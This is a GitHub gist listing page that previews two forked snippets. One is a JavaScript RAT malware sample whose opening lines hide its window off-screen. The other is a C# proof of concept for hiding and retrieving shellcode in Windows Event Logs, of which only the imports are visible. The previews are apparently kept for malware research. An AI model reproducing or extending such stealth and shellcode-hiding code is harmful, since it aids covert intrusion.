Skip to content

Instantly share code, notes, and snippets.

@vforvasilis
vforvasilis / JavaScript RAT
Created March 21, 2023 10:21 — forked from JohnLaTwC/JavaScript RAT
JavaScript RAT
## uploaded by @JohnLaTwC
## sample hash: 1d37e2a657ccc595c7a5544df6fd2d35739455f3fdbc2d2700835873130befde
<html>
<head>
<script language="JScript">
window.resizeTo(1, 1);
window.moveTo(-2000, -2000);
window.blur();
try
@vforvasilis
vforvasilis / EventLogInject.cs
Created May 12, 2022 09:03 — forked from filipposmastro/EventLogInject.cs
POC to inject and extract shellcode from Windows Event Logs
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.Linq;
using System.Runtime.InteropServices;
using System.Text;
using System.Threading.Tasks;
namespace HiddenEventLogs
{